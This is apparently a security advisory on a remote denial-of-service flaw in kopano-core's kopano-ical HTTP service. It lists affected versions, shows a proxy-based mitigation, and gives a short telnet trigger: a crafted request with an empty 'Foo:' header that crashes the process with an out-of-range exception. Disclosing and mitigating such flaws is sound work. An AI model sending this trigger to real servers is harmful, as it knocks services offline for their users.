kopano-core 11.0.1.77: Remote DoS with out-of-bounds access

[Jan Engelhardt <jengelh () inai de>]

Initial publication, no CVE number yet.

# Affected versions

  * kopano-core 11.0.1
  * kopano-core 8.7.20
  * it is believed this affects all other versions too,
    including 10.0.7, 9.1.0, and zarafa 7.2.6.

The "kopano-ical" program implements a network service/trivial HTTP 
server. It fails to properly check HTTP headers, and with a crafted 
request, can be exploited to drive the process into an exception and 
have it terminate.


# Trigger

» ./kopano-ical -F &
» telnet localhost 8000
Trying ::1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Foo:
Connection closed by foreign host.
terminate called after throwing an instance of 'std::out_of_range'
  what():  basic_string::substr: __pos (which is 6) > this->size() (which is 5)


# Mitigation

In conjunction with a proxy, the issue does not occur as they often 
filter lines (LF->CRLF, giving an extra byte). Tested ones: 
nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0